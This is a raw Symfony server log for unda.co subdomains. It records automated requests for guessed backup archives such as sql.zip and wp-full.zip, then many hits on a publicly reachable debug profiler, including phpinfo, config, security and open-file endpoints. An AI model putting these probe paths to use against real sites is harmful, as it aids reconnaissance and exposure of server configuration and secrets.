  8482. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /graphql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /graphql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8483. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /client.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /client.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8484. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /elasticsearch.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /elasticsearch.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8485. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /repo.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /repo.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8486. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /control_panel.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /control_panel.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8487. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /downloads.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /downloads.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8488. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /yarn.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /yarn.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8489. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sandbox.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sandbox.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8490. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /toml.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /toml.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8491. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /npm.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /npm.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8492. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-2024.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-2024.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8493. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /godaddy.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /godaddy.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8494. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /configuration.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /configuration.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8495. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /htdocs.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /htdocs.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8496. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /bluehost.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /bluehost.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8497. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /videos.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /videos.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8498. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wordpress-complete.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wordpress-complete.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8499. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sql.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sql.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8500. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /options.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /options.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8501. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /siteground.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /siteground.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8502. [2025-12-20 21:33:47] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /wp-full.zip"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /wp-full.zip\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8503. [2025-12-20 21:35:16] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9c9de9","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/9c9de9?panel=swiftmailer","method":"GET"} []
  8504. [2025-12-20 21:35:16] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=swiftmailer","method":"GET"} []
  8505. [2025-12-20 21:39:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=twig","method":"GET"} []
  8506. [2025-12-20 21:39:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  8507. [2025-12-20 21:42:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=cache","method":"GET"} []
  8508. [2025-12-20 21:42:48] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  8509. [2025-12-20 21:42:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=dump","method":"GET"} []
  8510. [2025-12-20 21:42:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=dump","method":"GET"} []
  8511. [2025-12-20 21:43:11] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"2882d9","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/2882d9?panel=logger","method":"GET"} []
  8512. [2025-12-20 21:43:11] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  8513. [2025-12-20 21:44:44] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"d06d99","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/d06d99?panel=config","method":"GET"} []
  8514. [2025-12-20 21:44:44] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  8515. [2025-12-20 21:49:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  8516. [2025-12-20 21:49:33] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://auth.unda.co/_profiler/phpinfo","method":"GET"} []
  8517. [2025-12-20 21:53:47] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  8518. [2025-12-20 21:53:47] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  8519. [2025-12-20 21:53:47] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  8520. [2025-12-20 21:53:47] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  8521. [2025-12-20 21:53:47] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  8522. [2025-12-20 21:53:47] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  8523. [2025-12-20 21:53:47] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  8524. [2025-12-20 21:53:47] security.DEBUG: Calling Authentication entry point. [] []
  8525. [2025-12-20 21:53:47] request.INFO: Matched route "index". {"route":"index","route_parameters":{"_controller":"Hona\\LandingBundle\\Controller\\DefaultController::indexAction","_route":"index"},"request_uri":"https://unda.co/","method":"GET"} []
  8526. [2025-12-20 21:53:48] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  8527. [2025-12-20 21:53:49] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://unda.co/_profiler/phpinfo","method":"GET"} []
  8528. [2025-12-20 21:53:49] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://web.unda.co/_profiler/phpinfo","method":"GET"} []
  8529. [2025-12-20 21:53:50] request.INFO: Matched route "_profiler_phpinfo". {"route":"_profiler_phpinfo","route_parameters":{"_controller":"web_profiler.controller.profiler:phpinfoAction","_route":"_profiler_phpinfo"},"request_uri":"https://admin.unda.co/_profiler/phpinfo","method":"GET"} []
  8530. [2025-12-20 21:53:50] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  8531. [2025-12-20 21:53:50] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  8532. [2025-12-20 21:53:50] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  8533. [2025-12-20 21:53:50] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  8534. [2025-12-20 21:53:50] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  8535. [2025-12-20 21:53:50] security.DEBUG: Calling Authentication entry point. [] []
  8536. [2025-12-20 21:53:51] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F_profiler%2Fphpinfo","method":"GET"} []
  8537. [2025-12-20 21:53:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8538. [2025-12-20 21:53:58] request.INFO: Matched route "hona_admin_default_index". {"route":"hona_admin_default_index","route_parameters":{"_controller":"Hona\\AdminBundle\\Controller\\DefaultController::indexAction","_route":"hona_admin_default_index"},"request_uri":"https://admin.unda.co/","method":"GET"} []
  8539. [2025-12-20 21:53:58] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"cookie_presence","authenticators":1} []
  8540. [2025-12-20 21:53:58] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  8541. [2025-12-20 21:53:58] security.DEBUG: Guard authenticator does not support the request. {"firewall_key":"cookie_presence","authenticator":"Hona\\AdminBundle\\Security\\AdminAuthenticator"} []
  8542. [2025-12-20 21:53:58] security.INFO: Populated the TokenStorage with an anonymous Token. [] []
  8543. [2025-12-20 21:53:58] security.DEBUG: Access denied, the user is not fully authenticated; redirecting to authentication entry point. {"exception":"[object] (Symfony\\Component\\Security\\Core\\Exception\\AccessDeniedException(code: 403): Access Denied. at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/Security/Http/Firewall/AccessListener.php:68)"} []
  8544. [2025-12-20 21:53:58] security.DEBUG: Calling Authentication entry point. [] []
  8545. [2025-12-20 21:53:59] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/?redirect_uri=https%3A%2F%2Fadmin.unda.co%2F","method":"GET"} []
  8546. [2025-12-20 21:54:02] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /symfony/public/_profiler/phpinfo"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /symfony/public/_profiler/phpinfo\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  8547. [2025-12-20 21:55:18] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=twig","method":"GET"} []
  8548. [2025-12-20 21:55:18] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  8549. [2025-12-20 21:55:20] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cc2d11","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/cc2d11?panel=security","method":"GET"} []
  8550. [2025-12-20 21:55:20] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  8551. [2025-12-20 21:55:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"cd6bf0","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/cd6bf0?panel=security","method":"GET"} []
  8552. [2025-12-20 21:55:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  8553. [2025-12-20 22:00:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://auth.unda.co/_profiler/latest?ip=66.249.77.32&limit=10","method":"GET"} []
  8554. [2025-12-20 22:00:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://auth.unda.co/_profiler/search_bar?ip=66.249.77.32&limit=10","method":"GET"} []
  8555. [2025-12-20 22:05:22] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f2b816","_route":"_profiler"},"request_uri":"https://web.unda.co/_profiler/f2b816?panel=cache","method":"GET"} []
  8556. [2025-12-20 22:05:22] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  8557. [2025-12-20 22:07:48] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fswiftmailer-bundle&line=0","method":"GET"} []
  8558. [2025-12-20 22:07:51] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FBundle%2FSecurityBundle&line=0","method":"GET"} []
  8559. [2025-12-20 22:09:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"6daf42","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/6daf42?panel=db","method":"GET"} []
  8560. [2025-12-20 22:09:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  8561. [2025-12-20 22:09:48] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"4daf2f","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/4daf2f?panel=config","method":"GET"} []
